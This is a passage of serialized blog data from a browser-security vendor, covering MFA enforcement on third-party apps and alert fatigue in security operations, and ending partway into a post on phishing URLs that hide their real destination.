account.",{"data":35268,"content":35269,"nodeType":879},{},[35270,35274,35278],{"data":35271,"marks":35272,"value":35273,"nodeType":883},{},[],"You can get all three with the Push platform. The missing piece we’ve now added is a way to automatically prompt employees to add MFA wherever it’s missing. Enter ",{"data":35275,"marks":35276,"value":26392,"nodeType":883},{},[35277],{"type":916},{"data":35279,"marks":35280,"value":1350,"nodeType":883},{},[],{"data":35282,"content":35283,"nodeType":905},{},[],{"data":35285,"content":35286,"nodeType":909},{},[35287],{"data":35288,"marks":35289,"value":35290,"nodeType":883},{},[],"How Push helps you ensure MFA coverage",{"data":35292,"content":35293,"nodeType":879},{},[35294],{"data":35295,"marks":35296,"value":35297,"nodeType":883},{},[],"Let’s take a look at a hypothetical incident response scenario to see how Push’s identity visibility and security controls help you ensure MFA coverage.",{"data":35299,"content":35300,"nodeType":879},{},[35301],{"data":35302,"marks":35303,"value":35304,"nodeType":883},{},[],"We’ll assume that prior to this incident, you had already deployed the Push browser extension, which you can install and enforce using any MDM solution, on all major browsers.",{"data":35306,"content":35307,"nodeType":879},{},[35308],{"data":35309,"marks":35310,"value":35311,"nodeType":883},{},[],"It’s a Friday afternoon (sorry).",{"data":35313,"content":35314,"nodeType":879},{},[35315],{"data":35316,"marks":35317,"value":35318,"nodeType":883},{},[],"News breaks that there’s been a suspected breach at a popular enterprise SaaS service.",{"data":35320,"content":35321,"nodeType":879},{},[35322],{"data":35323,"marks":35324,"value":35325,"nodeType":883},{},[],"You’re familiar with the service, but you don’t believe it’s a core managed app at your organization. Unfortunately, that does not mean you don’t have accounts (sorry again).",{"data":35327,"content":35328,"nodeType":879},{},[35329],{"data":35330,"marks":35331,"value":35332,"nodeType":883},{},[],"Using Push, you can:",{"data":35334,"content":35335,"nodeType":1531},{},[35336,35355,35365,35392,35418],{"data":35337,"content":35338,"nodeType":1535},{},[35339],{"data":35340,"content":35341,"nodeType":879},{},[35342,35346,35351],{"data":35343,"marks":35344,"value":35345,"nodeType":883},{},[],"Immediately check whether the Push extension has observed employee usage of the breached app. It will appear on the ",{"data":35347,"marks":35348,"value":35350,"nodeType":883},{},[35349],{"type":916},"Apps",{"data":35352,"marks":35353,"value":35354,"nodeType":883},{},[]," table. From this overview, you can see how many accounts Push has seen on that app and how they are accessing it (SSO vs. other methods, such as local password login).",{"data":35356,"content":35357,"nodeType":1535},{},[35358],{"data":35359,"content":35360,"nodeType":879},{},[35361],{"data":35362,"marks":35363,"value":35364,"nodeType":883},{},[],"For those accounts on the breached app, you can quickly see whether they have MFA, and which methods are registered. To determine MFA status, the Push extension uses the existing user’s active session on an app to query that account’s MFA registration status using the app’s own API, providing a trustworthy verification. ",{"data":35366,"content":35367,"nodeType":1535},{},[35368],{"data":35369,"content":35370,"nodeType":879},{},[35371,35375,35380,35384,35389],{"data":35372,"marks":35373,"value":35374,"nodeType":883},{},[],"You can also see whether the users’ passwords have any security issues, such as a verified stolen credential, or a password that’s weak or reused by filtering the ",{"data":35376,"marks":35377,"value":35379,"nodeType":883},{},[35378],{"type":916},"Accounts",{"data":35381,"marks":35382,"value":35383,"nodeType":883},{},[]," list for ",{"data":35385,"marks":35386,"value":35388,"nodeType":883},{},[35387],{"type":916},"Findings",{"data":35390,"marks":35391,"value":1350,"nodeType":883},{},[],{"data":35393,"content":35394,"nodeType":1535},{},[35395],{"data":35396,"content":35397,"nodeType":879},{},[35398,35402,35406,35410,35414],{"data":35399,"marks":35400,"value":35401,"nodeType":883},{},[],"For accounts that lack MFA, you can then configure the ",{"data":35403,"marks":35404,"value":26392,"nodeType":883},{},[35405],{"type":916},{"data":35407,"marks":35408,"value":35409,"nodeType":883},{},[]," control from the ",{"data":35411,"marks":35412,"value":27150,"nodeType":883},{},[35413],{"type":916},{"data":35415,"marks":35416,"value":35417,"nodeType":883},{},[]," page. This will prompt employees who lack MFA to set it up whenever they next use the app. In parallel, you can reach out to affected employees through your preferred comms channel and ask them to immediately register for MFA and change their password on the app. ",{"data":35419,"content":35420,"nodeType":1535},{},[35421],{"data":35422,"content":35423,"nodeType":879},{},[35424,35428,35437],{"data":35425,"marks":35426,"value":35427,"nodeType":883},{},[],"Then use Push’s webhooks to monitor for MFA registrations and password changes to roll in, by querying the ",{"data":35429,"content":35431,"nodeType":940},{"uri":35430},"https:\u002F\u002Fpushsecurity.redoc.ly\u002Fwebhooks-v1#operation\u002Flogin-event",[35432],{"data":35433,"marks":35434,"value":35436,"nodeType":883},{},[35435],{"type":948},"Login event",{"data":35438,"marks":35439,"value":1350,"nodeType":883},{},[],{"data":35441,"content":35445,"nodeType":971},{"target":35442},{"sys":35443},{"id":35444,"type":976,"linkType":977},"4OVJU6FRSVU9j1WB9NGyJ4",[],{"data":35447,"content":35448,"nodeType":879},{},[35449,35453,35457],{"data":35450,"marks":35451,"value":35452,"nodeType":883},{},[],"By combining visibility of your workforce identities — including granular context on their MFA registration status, MFA methods, and password security, even on unmanaged apps — with in-browser controls like ",{"data":35454,"marks":35455,"value":26392,"nodeType":883},{},[35456],{"type":916},{"data":35458,"marks":35459,"value":35460,"nodeType":883},{},[],", Push helps security teams respond quickly and with assurance that they have the right information and tools to remediate the issue.",{"data":35462,"content":35463,"nodeType":909},{},[35464],{"data":35465,"marks":35466,"value":35467,"nodeType":883},{},[],"A closer look at MFA enforcement",{"data":35469,"content":35470,"nodeType":879},{},[35471,35475,35479],{"data":35472,"marks":35473,"value":35474,"nodeType":883},{},[],"With the in-browser ",{"data":35476,"marks":35477,"value":26392,"nodeType":883},{},[35478],{"type":916},{"data":35480,"marks":35481,"value":35482,"nodeType":883},{},[]," control, we chose this approach to close the loop on missing MFA issues because:",{"data":35484,"content":35485,"nodeType":1531},{},[35486,35496,35506],{"data":35487,"content":35488,"nodeType":1535},{},[35489],{"data":35490,"content":35491,"nodeType":879},{},[35492],{"data":35493,"marks":35494,"value":35495,"nodeType":883},{},[],"It meets users where they are, in the most relevant context where they can successfully address the issue.",{"data":35497,"content":35498,"nodeType":1535},{},[35499],{"data":35500,"content":35501,"nodeType":879},{},[35502],{"data":35503,"marks":35504,"value":35505,"nodeType":883},{},[],"It solves the problem of enforcing MFA on apps that are outside of administrative control — or that don’t provide any administrative controls to enforce MFA registration natively.",{"data":35507,"content":35508,"nodeType":1535},{},[35509],{"data":35510,"content":35511,"nodeType":879},{},[35512],{"data":35513,"marks":35514,"value":35515,"nodeType":883},{},[],"It’s tenant-agnostic. That means that you can enforce MFA for a given app on all tenants of that app, even those free-tier or test tenants that you don’t know about and have no control over.",{"data":35517,"content":35518,"nodeType":879},{},[35519,35523,35527],{"data":35520,"marks":35521,"value":35522,"nodeType":883},{},[],"As a happy side effect, your compliance team will thank you for finally allowing them to attest to where MFA is ",{"data":35524,"marks":35525,"value":888,"nodeType":883},{},[35526],{"type":891},{"data":35528,"marks":35529,"value":35530,"nodeType":883},{},[]," enforced — with verified results, visible at the account level in Push’s admin reporting — across your environment.",{"data":35532,"content":35533,"nodeType":879},{},[35534],{"data":35535,"marks":35536,"value":35537,"nodeType":883},{},[],"Here’s a closer look at how it works:",{"data":35539,"content":35540,"nodeType":879},{},[35541,35545,35549],{"data":35542,"marks":35543,"value":35544,"nodeType":883},{},[],"To enable MFA enforcement, use the configuration tile on the ",{"data":35546,"marks":35547,"value":27150,"nodeType":883},{},[35548],{"type":916},{"data":35550,"marks":35551,"value":35552,"nodeType":883},{},[]," page of the Push admin console and select which apps should require MFA registration. The control currently works with ~90 high-value apps, including Postman, Retool, Datadog, Atlassian, Okta, and others.",{"data":35554,"content":35558,"nodeType":971},{"target":35555},{"sys":35556},{"id":35557,"type":976,"linkType":977},"2sDbYZL4oJDxLMbYErJfIN",[],{"data":35560,"content":35561,"nodeType":879},{},[35562],{"data":35563,"marks":35564,"value":35565,"nodeType":883},{},[],"You can then customize the message the employees will see.",{"data":35567,"content":35568,"nodeType":879},{},[35569],{"data":35570,"marks":35571,"value":35572,"nodeType":883},{},[],"On the end-user side, employees will see a banner with your message as soon as they use an app where they lack MFA. ",{"data":35574,"content":35578,"nodeType":971},{"target":35575},{"sys":35576},{"id":35577,"type":976,"linkType":977},"37aH1maXXkF8DxgjUod5dn",[],{"data":35580,"content":35581,"nodeType":879},{},[35582],{"data":35583,"marks":35584,"value":35585,"nodeType":883},{},[],"To complete MFA registration, the user can go directly to the app’s MFA registration page from a link in the banner (Push provides this link automatically, where one exists). The extension will query the user’s MFA status regularly in the background and when MFA registration is completed, the banner will disappear and the Push platform will clear the “No MFA” security finding for that account.",{"data":35587,"content":35591,"nodeType":971},{"target":35588},{"sys":35589},{"id":35590,"type":976,"linkType":977},"3yb4KjhH3AbvvSnfMbNONr",[],{"data":35593,"content":35594,"nodeType":909},{},[35595],{"data":35596,"marks":35597,"value":35598,"nodeType":883},{},[],"Find out more",{"data":35600,"content":35601,"nodeType":879},{},[35602,35606,35613],{"data":35603,"marks":35604,"value":35605,"nodeType":883},{},[],"To test our MFA visibility and control features, ",{"data":35607,"content":35608,"nodeType":940},{"uri":19011},[35609],{"data":35610,"marks":35611,"value":35612,"nodeType":883},{},[],"request a demo",{"data":35614,"marks":35615,"value":35616,"nodeType":883},{},[]," from our team. We look forward to helping you finally turn the challenge of MFA coverage into a simple problem, easily solved.","No more hard simple problems: Enforce MFA on third-party apps with Push","Using Push to enforce MFA on third-party apps in the browser — even where MFA enforcement isn't supported by the app itself.","2025-01-16T00:00:00.000Z","enforce-mfa-on-third-party-apps",{"items":35622},[35623,35625],{"sys":35624,"name":298},{"id":6696},{"sys":35626,"name":343},{"id":3276},{"items":35628},[35629],{"fullName":4797,"firstName":4798,"jobTitle":4799,"profilePicture":35630},{"url":4801},{"__typename":1967,"sys":35632,"content":35634,"title":36119,"synopsis":36120,"hashTags":59,"publishedDate":36121,"slug":36122,"tagsCollection":36123,"authorsCollection":36129},{"id":35633},"6jYmU1ROpwI41mmzk7ioKd",{"json":35635},{"data":35636,"content":35637,"nodeType":875},{},[35638,35645,35652,35655,35662,35696,35708,35733,35740,35743,35750,35757,35764,35770,35777,35807,35813,35820,35840,35846,35853,35859,35862,35869,35905,35912,35955,35962,35968,35975,35982,35985,35992,35999,36006,36026,36032,36039,36046,36053,36059,36066,36072,36075,36081,36088,36095],{"data":35639,"content":35640,"nodeType":879},{},[35641],{"data":35642,"marks":35643,"value":35644,"nodeType":883},{},[],"After more than two decades in cybersecurity, I’ve witnessed the evolution (and at times, devolution) of detection and response capabilities. I’ve sat in countless SOCs watching analysts drown in a sea of alerts, spent hours chasing false positives, and seen talented security professionals burn out from the relentless noise of low-fidelity detection systems. ",{"data":35646,"content":35647,"nodeType":879},{},[35648],{"data":35649,"marks":35650,"value":35651,"nodeType":883},{},[],"It’s a problem that’s reached crisis proportions, and it’s exactly why our approach to browser security represents not just a technological shift, but a philosophical one.",{"data":35653,"content":35654,"nodeType":905},{},[],{"data":35656,"content":35657,"nodeType":909},{},[35658],{"data":35659,"marks":35660,"value":35661,"nodeType":883},{},[],"The alert fatigue epidemic",{"data":35663,"content":35664,"nodeType":879},{},[35665,35669,35674,35678,35683,35687,35692],{"data":35666,"marks":35667,"value":35668,"nodeType":883},{},[],"Early in my career, getting ",{"data":35670,"marks":35671,"value":35673,"nodeType":883},{},[35672],{"type":891},"any",{"data":35675,"marks":35676,"value":35677,"nodeType":883},{},[]," alert felt like a victory. We were flying blind outside of our small windows of network traffic. But as the industry matured, something troubling happened: we began equating ",{"data":35679,"marks":35680,"value":35682,"nodeType":883},{},[35681],{"type":916},"volume",{"data":35684,"marks":35685,"value":35686,"nodeType":883},{},[]," with ",{"data":35688,"marks":35689,"value":35691,"nodeType":883},{},[35690],{"type":916},"value",{"data":35693,"marks":35694,"value":35695,"nodeType":883},{},[],". Vendors started competing on how many alerts they could generate, how much data they could collect, and how comprehensive their “visibility” could be. ",{"data":35697,"content":35698,"nodeType":879},{},[35699,35703],{"data":35700,"marks":35701,"value":35702,"nodeType":883},{},[],"Security teams followed suit with operational metrics that captured how many alerts they’d resolved, how many “attacks” they’d stopped, and how many tickets they’d opened and closed in a given work cycle. But as many teams have now realized, ",{"data":35704,"marks":35705,"value":35707,"nodeType":883},{},[35706],{"type":916},"volume is a vanity metric; fidelity is what keeps you safe.",{"data":35709,"content":35710,"nodeType":879},{},[35711,35715,35724,35728],{"data":35712,"marks":35713,"value":35714,"nodeType":883},{},[],"In my course on ",{"data":35716,"content":35718,"nodeType":940},{"uri":35717},"https:\u002F\u002Fwww.sans.org\u002Fcyber-security-courses\u002Fbuilding-leading-security-operations-centers",[35719],{"data":35720,"marks":35721,"value":35723,"nodeType":883},{},[35722],{"type":948},"Building and Leading Security Operations teams",{"data":35725,"marks":35726,"value":35727,"nodeType":883},{},[],", we discuss the importance of analytic outcomes and addressing ineffective alerts to continuously improve fidelity. My students often find it hard to believe how much time and effort it takes to audit alert quality and implement continuous improvements on a large scale. This isn’t just an operational problem — it’s an existential threat to effective security. ",{"data":35729,"marks":35730,"value":35732,"nodeType":883},{},[35731],{"type":916},"When everything is an alert, nothing is. ",{"data":35734,"content":35735,"nodeType":879},{},[35736],{"data":35737,"marks":35738,"value":35739,"nodeType":883},{},[],"And while we have been busy focusing on more (and occasionally, better) detections at the endpoint and network layers, attackers have shifted to infrastructure that isn’t as well-instrumented: SaaS and the browser.",{"data":35741,"content":35742,"nodeType":905},{},[],{"data":35744,"content":35745,"nodeType":909},{},[35746],{"data":35747,"marks":35748,"value":35749,"nodeType":883},{},[],"The browser: a new frontier in detection and response",{"data":35751,"content":35752,"nodeType":879},{},[35753],{"data":35754,"marks":35755,"value":35756,"nodeType":883},{},[],"Today, the browser is the place where most cyber attacks happen. It’s where users interact with the applications that your business runs on, handle sensitive data, and unfortunately, where they encounter sophisticated phishing campaigns, credential harvesting attacks, and malicious downloads. ",{"data":35758,"content":35759,"nodeType":879},{},[35760],{"data":35761,"marks":35762,"value":35763,"nodeType":883},{},[],"Yet for most security teams, the browser remains a black box, obscured from the view from the network and the endpoint. Even worse, attack models often applied to detection engineering for endpoint or network-centric threats don’t really apply; modern identity attacks skip entire phases of the attack chain, eliminating many detection opportunities along the way. The modern attack path doesn’t need to touch the endpoint or your network at all — it can happen entirely over the internet. ",{"data":35765,"content":35769,"nodeType":971},{"target":35766},{"sys":35767},{"id":35768,"type":976,"linkType":977},"4wYYgbKmmVAZTF7niXJEGc",[],{"data":35771,"content":35772,"nodeType":1036},{},[35773],{"data":35774,"marks":35775,"value":35776,"nodeType":883},{},[],"Attackers are exploiting the detection gap",{"data":35778,"content":35779,"nodeType":879},{},[35780,35784,35791,35795,35803],{"data":35781,"marks":35782,"value":35783,"nodeType":883},{},[],"You only need to look at in-the-wild breaches such as last year’s ",{"data":35785,"content":35786,"nodeType":940},{"uri":35066},[35787],{"data":35788,"marks":35789,"value":945,"nodeType":883},{},[35790],{"type":948},{"data":35792,"marks":35793,"value":35794,"nodeType":883},{},[]," attacks, or the recent ",{"data":35796,"content":35797,"nodeType":940},{"uri":17130},[35798],{"data":35799,"marks":35800,"value":35802,"nodeType":883},{},[35801],{"type":948},"Salesforce",{"data":35804,"marks":35805,"value":35806,"nodeType":883},{},[]," breaches to see the impact that attackers can have by executing attacks entirely over the internet, without touching traditional network devices or user endpoints. ",{"data":35808,"content":35812,"nodeType":971},{"target":35809},{"sys":35810},{"id":35811,"type":976,"linkType":977},"VfTps3SGKJDlhFcmh42d9",[],{"data":35814,"content":35815,"nodeType":879},{},[35816],{"data":35817,"marks":35818,"value":35819,"nodeType":883},{},[],"But even in the context of more “conventional” attacks (e.g. the classic route of compromising an endpoint, moving laterally through an environment, taking control of a domain, and deploying ransomware), most of the time, these attacks begin in the browser with identities and cloud apps rather than exploit-driven initial access — such as with the recent attacks on Marks & Spencer, Co-op, and Jaguar Land Rover. ",{"data":35821,"content":35822,"nodeType":879},{},[35823,35827,35836],{"data":35824,"marks":35825,"value":35826,"nodeType":883},{},[],"While the ",{"data":35828,"content":35830,"nodeType":940},{"uri":35829},"https:\u002F\u002Fcloud.google.com\u002Fsecurity\u002Fresources\u002Finsights\u002Ftargeted-attack-lifecycle",[35831],{"data":35832,"marks":35833,"value":35835,"nodeType":883},{},[35834],{"type":948},"attack cycle",{"data":35837,"marks":35838,"value":35839,"nodeType":883},{},[]," and similar mental models are valuable for planning in-depth detections of sophisticated, multi-stage attacks, focusing too heavily on them can lead to overlooked scenarios. These high-profile incidents have demonstrated the opportunity cost of neglecting visibility into attacks that don't perfectly align with these models. ",{"data":35841,"content":35845,"nodeType":971},{"target":35842},{"sys":35843},{"id":35844,"type":976,"linkType":977},"3TsKtoWuxQMFl1xd3w1j86",[],{"data":35847,"content":35848,"nodeType":879},{},[35849],{"data":35850,"marks":35851,"value":35852,"nodeType":883},{},[],"Just as endpoint detection and response revolutionized host-based security by providing visibility and control directly at the point of attack, browser-based security platforms can do the same for web-borne threats. It’s an important addition to the detection and response stack that illuminates a “missing middle” in modern attack investigations, and intervenes in real time, much like traditional EDR did for the endpoint years ago.",{"data":35854,"content":35858,"nodeType":971},{"target":35855},{"sys":35856},{"id":35857,"type":976,"linkType":977},"1eCXGC6U6SdzHmOH1gv24O",[],{"data":35860,"content":35861,"nodeType":905},{},[],{"data":35863,"content":35864,"nodeType":909},{},[35865],{"data":35866,"marks":35867,"value":35868,"nodeType":883},{},[],"High-fidelity detection: quality over quantity",{"data":35870,"content":35871,"nodeType":879},{},[35872,35876,35883,35887,35892,35896,35901],{"data":35873,"marks":35874,"value":35875,"nodeType":883},{},[],"Our ",{"data":35877,"content":35878,"nodeType":940},{"uri":20441},[35879],{"data":35880,"marks":35881,"value":35882,"nodeType":883},{},[],"design philosophy",{"data":35884,"marks":35885,"value":35886,"nodeType":883},{},[]," centers on a principle often overlooked in the security industry: prioritizing actionable problems for security teams. This involves differentiating between \"",{"data":35888,"marks":35889,"value":35891,"nodeType":883},{},[35890],{"type":916},"events",{"data":35893,"marks":35894,"value":35895,"nodeType":883},{},[],"\" – environment data that may or may not be useful – and \"",{"data":35897,"marks":35898,"value":35900,"nodeType":883},{},[35899],{"type":916},"detections",{"data":35902,"marks":35903,"value":35904,"nodeType":883},{},[],"\" – high-fidelity, actionable signals with a negligible false positive rate. We also empower our customers with the ability to intervene in real-time when there are high-confidence indicators of an attack. We focus on detecting not atomic indicators, but on attacker tooling and behaviors.",{"data":35906,"content":35907,"nodeType":879},{},[35908],{"data":35909,"marks":35910,"value":35911,"nodeType":883},{},[],"Compare this to traditional approaches that might generate alerts for:",{"data":35913,"content":35914,"nodeType":1531},{},[35915,35925,35935,35945],{"data":35916,"content":35917,"nodeType":1535},{},[35918],{"data":35919,"content":35920,"nodeType":879},{},[35921],{"data":35922,"marks":35923,"value":35924,"nodeType":883},{},[],"Visiting domains with low reputation scores (but not necessarily malicious)",{"data":35926,"content":35927,"nodeType":1535},{},[35928],{"data":35929,"content":35930,"nodeType":879},{},[35931],{"data":35932,"marks":35933,"value":35934,"nodeType":883},{},[],"Downloading files that match certain heuristics (but may be legitimate)",{"data":35936,"content":35937,"nodeType":1535},{},[35938],{"data":35939,"content":35940,"nodeType":879},{},[35941],{"data":35942,"marks":35943,"value":35944,"nodeType":883},{},[],"Accessing new web applications (that may be approved, or tacitly allowed, shadow IT)",{"data":35946,"content":35947,"nodeType":1535},{},[35948],{"data":35949,"content":35950,"nodeType":879},{},[35951],{"data":35952,"marks":35953,"value":35954,"nodeType":883},{},[],"Employee usernames, passwords, and email addresses for sale on the dark web (which may no longer be valid)",{"data":35956,"content":35957,"nodeType":879},{},[35958],{"data":35959,"marks":35960,"value":35961,"nodeType":883},{},[],"These low-fidelity alerts create work without providing solutions. They force analysts to become investigators rather than responders, spending precious time determining whether an alert represents a genuine threat rather than focusing on mitigation and recovery. ",{"data":35963,"content":35967,"nodeType":971},{"target":35964},{"sys":35965},{"id":35966,"type":976,"linkType":977},"4MydcqvHnWsziCOPUNC3YS",[],{"data":35969,"content":35970,"nodeType":879},{},[35971],{"data":35972,"marks":35973,"value":35974,"nodeType":883},{},[],"Poor quality detections also present an easy opportunity for security teams to commit a cardinal sin: disrupting users and business processes without a clear justification for doing so. User trust and support should always be treated as a finite resource, and every account locked, website blocked, and laptop reimaged chips away at that resource. ",{"data":35976,"content":35977,"nodeType":879},{},[35978],{"data":35979,"marks":35980,"value":35981,"nodeType":883},{},[],"Likewise, the more disruptive, the more likely users will look for ways around said controls. If your users are actively working against you, and feel you are preventing them from doing their jobs, they’ll always find new and unexpected ways around security blocks. ",{"data":35983,"content":35984,"nodeType":905},{},[],{"data":35986,"content":35987,"nodeType":909},{},[35988],{"data":35989,"marks":35990,"value":35991,"nodeType":883},{},[],"The SOC analyst's perspective",{"data":35993,"content":35994,"nodeType":879},{},[35995],{"data":35996,"marks":35997,"value":35998,"nodeType":883},{},[],"The most successful SOC analysts share a common trait: they’re extraordinarily good at quickly distinguishing signal from noise. But this skill shouldn’t be required! It’s a failure of our detection systems that we’re forcing human analysts to perform pattern matching that our technology should handle. ",{"data":36000,"content":36001,"nodeType":879},{},[36002],{"data":36003,"marks":36004,"value":36005,"nodeType":883},{},[],"But even for the most skilled analyst, it’s a tall order to ask your security team to also be experts in every cloud app your business relies on, making it even harder than normal to build context-driven alerts. Most of the time, the information required simply doesn't exist, with logs simply not available (generally, or at your product tier) or the work required to extract the logs and turn them into context-driven alerts hasn’t happened yet. If your team is under-resourced and drowning in low-fidelity alerts already, then realistically it might never happen. ",{"data":36007,"content":36008,"nodeType":879},{},[36009,36013,36022],{"data":36010,"marks":36011,"value":36012,"nodeType":883},{},[],"Effective browser security changes this dynamic. Instead of presenting analysts with hundreds of “suspicious web activity” alerts that require investigation, ",{"data":36014,"content":36016,"nodeType":940},{"uri":36015},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fdetecting-and-blocking-phishing-attacks-in-the-browser\u002F",[36017],{"data":36018,"marks":36019,"value":36021,"nodeType":883},{},[36020],{"type":948},"our platform focuses on high-reliability indicators",{"data":36023,"marks":36024,"value":36025,"nodeType":883},{},[]," like whether a phishing kit was observed running on the page, or whether the page was cloned from a legitimate site. We even detect user behaviors that could indicate a risk in the context of a phishing attack, like when a user attempts to authenticate with credentials that have been previously used on another page — either a sign of credential reuse (bad) or a phishing attack (even worse) — at which point Push can be set to block the attack in real time. ",{"data":36027,"content":36031,"nodeType":971},{"target":36028},{"sys":36029},{"id":36030,"type":976,"linkType":977},"3998Iy2kp9MW0HFeqmo900",[],{"data":36033,"content":36034,"nodeType":1036},{},[36035],{"data":36036,"marks":36037,"value":36038,"nodeType":883},{},[],"Browser security provides a new layer of protection, reducing the risk of breach",{"data":36040,"content":36041,"nodeType":879},{},[36042],{"data":36043,"marks":36044,"value":36045,"nodeType":883},{},[],"Attack detection has always been a cat-and-mouse game. For years, attackers have grappled with endpoint and network security vendors. And sometimes, the attackers win. The fact is that a lot of attacker innovation has gone into sandbox aware malware, breaking detection signatures, disabling security tools, and so on.    ",{"data":36047,"content":36048,"nodeType":879},{},[36049],{"data":36050,"marks":36051,"value":36052,"nodeType":883},{},[],"But with so many attacks now passing through the browser, defending it enables badness to be filtered out before it reaches the endpoint or network controls that attackers are looking to consciously evade. By preventing malware being delivered, or identities from being compromised, attacks otherwise crafted to evade traditional security controls can be intercepted early — making the crucial difference in whether a breach happens or not.",{"data":36054,"content":36058,"nodeType":971},{"target":36055},{"sys":36056},{"id":36057,"type":976,"linkType":977},"4Bh7uOkeguNJFmJ1XUQ317",[],{"data":36060,"content":36061,"nodeType":879},{},[36062],{"data":36063,"marks":36064,"value":36065,"nodeType":883},{},[],"And when it comes to the cloud-centric attacks that attackers are finding so much success with today, this is in effect a net new capability. ",{"data":36067,"content":36071,"nodeType":971},{"target":36068},{"sys":36069},{"id":36070,"type":976,"linkType":977},"4JdaY8I3f6Ub2Kifc9Rsj9",[],{"data":36073,"content":36074,"nodeType":905},{},[],{"data":36076,"content":36077,"nodeType":909},{},[36078],{"data":36079,"marks":36080,"value":30183,"nodeType":883},{},[],{"data":36082,"content":36083,"nodeType":879},{},[36084],{"data":36085,"marks":36086,"value":36087,"nodeType":883},{},[],"The browser represents one of the most significant opportunities in cybersecurity today. As we continue to expand our browser-based security capabilities, we remain committed to this high-fidelity approach. We’re building features that not only detect and prevent attacks but also provide security teams with the rich telemetry they need to develop custom queries and detections.",{"data":36089,"content":36090,"nodeType":879},{},[36091],{"data":36092,"marks":36093,"value":36094,"nodeType":883},{},[],"Push Security’s browser-based security platform provides comprehensive detection and response capabilities against techniques like AiTM phishing, credential stuffing, ClickFixing, malicious browser extensions, and session hijacking using stolen session tokens. You can also use Push to find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, risky OAuth integrations, and more to harden your identity attack surface.",{"data":36096,"content":36097,"nodeType":879},{},[36098,36101,36107,36110,36116],{"data":36099,"marks":36100,"value":16267,"nodeType":883},{},[],{"data":36102,"content":36103,"nodeType":940},{"uri":10222},[36104],{"data":36105,"marks":36106,"value":10228,"nodeType":883},{},[],{"data":36108,"marks":36109,"value":26256,"nodeType":883},{},[],{"data":36111,"content":36112,"nodeType":940},{"uri":4772},[36113],{"data":36114,"marks":36115,"value":1751,"nodeType":883},{},[],{"data":36117,"marks":36118,"value":1350,"nodeType":883},{},[],"Fixing SecOps alert fatigue with browser telemetry","How browser data can improve detection fidelity and reduce alert fatigue, enabling SecOps teams to save time and detect more attacks.","2025-10-07T00:00:00.000Z","fixing-secops-alert-fatigue-with-browser-telemetry",{"items":36124},[36125,36127],{"sys":36126,"name":343},{"id":3276},{"sys":36128,"name":3273},{"id":3272},{"items":36130},[36131],{"fullName":36132,"firstName":36133,"jobTitle":36134,"profilePicture":36135},"Mark Orlando","Mark","Field CTO",{"url":36136},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F592PMwIQQFaa24k5SKBEKF\u002Fa33090d0ad95d1e3081f5d16a46ba826\u002Fimage__68_.png","blog\u002Fintroducing-malicious-copy-paste-detection","Detect ClickFix-style attacks where users copy malicious scripts from their browser.",{"json":36140},{"data":36141,"content":36142,"nodeType":875},{},[36143],{"data":36144,"content":36145,"nodeType":879},{},[36146],{"data":36147,"marks":36148,"value":36149,"nodeType":883},{},[],"ClickFix, FileFix, fake CAPTCHA — whatever you call it, users interacting with malicious scripts in their web browser is a fast-growing source of security breaches. To tackle this threat, Push now detects malware delivery in the browser, supporting a layered defense against endpoint attacks. ",{"id":27246,"publishedAt":36151},"2026-08-12T11:53:43.034Z",{"items":36153},[36154,36156],{"sys":36155,"name":343},{"id":3276},{"sys":36157,"name":3273},{"id":3272},{"items":36159},[36160,36162,36164,36166,36168,36170,36172,36174,36176,36178,36180,36182,36184,36186],{"sys":36161,"name":280,"slug":281,"tier":31},{"id":277},{"sys":36163,"name":343,"slug":344,"tier":31},{"id":340},{"sys":36165,"name":298,"slug":299,"tier":31},{"id":295},{"sys":36167,"name":521,"slug":522,"tier":31},{"id":518},{"sys":36169,"name":641,"slug":642,"tier":31},{"id":638},{"sys":36171,"name":316,"slug":317,"tier":45},{"id":313},{"sys":36173,"name":450,"slug":451,"tier":45},{"id":447},{"sys":36175,"name":379,"slug":380,"tier":45},{"id":376},{"sys":36177,"name":607,"slug":608,"tier":45},{"id":604},{"sys":36179,"name":477,"slug":478,"tier":45},{"id":474},{"sys":36181,"name":442,"slug":443,"tier":45},{"id":439},{"sys":36183,"name":424,"slug":425,"tier":45},{"id":421},{"sys":36185,"name":539,"slug":540,"tier":45},{"id":536},{"sys":36187,"name":352,"slug":353,"tier":45},{"id":349},"WhJoIJQgr5uOa_CBJjozZ6Xe_GSP57ObHYXigZLLKo0",{"id":36190,"title":36191,"authorsCollection":36192,"content":36197,"extension":228,"faqItemsCollection":36398,"faqTitle":59,"featured":6,"hashTags":59,"meta":36400,"metaTitle":36401,"ogImage":59,"postType":34631,"publishedDate":36402,"relatedBlogPostsCollection":36403,"slug":38091,"stem":38092,"subtitle":59,"summary":38093,"synopsis":38103,"sys":38104,"tagsCollection":38107,"topicsCollection":38113,"__hash__":38127},"blog\u002Fblog\u002Fdetecting-phishing-pages-using-obfuscated-url-destinations.json","Detecting phishing pages using obfuscated URL destinations",{"items":36193},[36194],{"fullName":866,"firstName":867,"jobTitle":868,"socialLinks":36195,"profilePicture":36196},[870],{"url":872},{"json":36198,"links":36382},{"data":36199,"content":36200,"nodeType":875},{},[36201,36218,36225,36247,36254,36277,36296,36299,36307,36314,36321,36328,36334,36341,36347,36350,36357,36364],{"data":36202,"content":36203,"nodeType":879},{},[36204,36208,36214],{"data":36205,"marks":36206,"value":36207,"nodeType":883},{},[],"URL schema obfuscation is a technique that obfuscates the end destination of a URL by abusing the URL schema. It used to be common for pages using basic authentication to accept a username and password provided in the URL: for example, hxxps:\u002F\u002F",{"data":36209,"marks":36210,"value":36213,"nodeType":883},{},[36211,36212],{"type":916},{"type":948},"username:password",{"data":36215,"marks":36216,"value":36217,"nodeType":883},{},[],"@pushsecurity.com. ",{"data":36219,"content":36220,"nodeType":879},{},[36221],{"data":36222,"marks":36223,"value":36224,"nodeType":883},{},[],"The functionality is still supported by browsers, though it is rarely used today. Now, when a browser interprets a URL with the username section populated (anything before the \"@” sign), it discards it, and sends the request to the page or server following the \"@” sign. ",{"data":36226,"content":36227,"nodeType":879},{},[36228,36232,36237,36243],{"data":36229,"marks":36230,"value":36231,"nodeType":883},{},[],"This can be abused by attackers to send their victim to a malicious server IP or page URL after an initial legit-looking URL. So, for example: 